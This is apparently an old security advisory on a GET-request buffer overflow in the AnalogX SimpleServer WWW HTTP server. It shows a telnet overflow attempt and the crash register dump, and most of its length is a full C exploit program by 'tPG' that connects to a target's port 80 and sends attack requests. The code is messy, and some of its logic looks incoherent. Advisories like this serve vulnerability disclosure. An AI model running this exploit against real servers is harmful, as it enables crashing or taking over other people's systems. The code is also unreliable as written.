COMMAND
AnalogX
SYSTEMS AFFECTED
AnalogX WWW HTTP Server v1.1 for Win9x
PROBLEM
Introducing AnalogX SimpleServer: WWW, the first in a series of
simple to use yet powerful servers! This webserver is SO easy to
use, about the only thing you need to know how to do is drag and
drop files; then just click on the 'Start' button, and you're
webserver is up and running, serving your pages to the world!
WWW supports MIME file typing, CGI, common log format, and
multi-hosting, just to name a few! If you've always wanted a
compact, easy to use, versatile webserver, then you're prayers
have been answered.
UssrLabs found a local/remote Buffer overflow. The code that
handles GET commandshas an unchecked buffer that will allow
arbitrary code to be executed if it is overflowed. Example:
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>
Where [buffer] is aprox. 1000 characters. At his point the server
overflows. And on remote machine someone will be seeing something
like this.
HTTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:
Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
41414141 00af02f0
Binary or source for this Exploit (wen finished):
http://www.ussrback.com/
Meanwhile, here's another try for exploit by tPG Advisory.
/*
Code ripped from a cgi scanner.
I actually stumbled upon the exploit through this code.
C0D3 == M3SSY. Whatever.
-Presto/tPG
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin,foreign=0;
char ojsimp[20];
char *okay[2];
char *player[2];
okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
player[1] = "Check if its running now.";
if (argc<2)
{
printf("\n HOSTNAME PLEASE@!# ");
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t Crash Exploit for AnalogX SimpleServer v1.03\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n HTTPD Version. \n");
getchar();
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t Press something. \n");
getchar();
while(count++ < 2)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf(" %s : ",player[count]);
for(numin=0;numin < 20;numin++)
{
ojsimp[numin] = '\0';
}
send(sock, okay[count],strlen(okay[count]),0);
recv(sock, ojsimp, sizeof(ojsimp),0);
cgistr = strstr(ojsimp,foundmsg);
if( cgistr != NULL)
{
printf("Heh.\n");++foreign;
}
else printf(" tPG\n");
close(sock);
}
if (foreign)
{
printf("bl3h. bl4h. h3h. w00p. 33p.\n");
}
}
SOLUTION
Nothing yet, but vendor has been informed.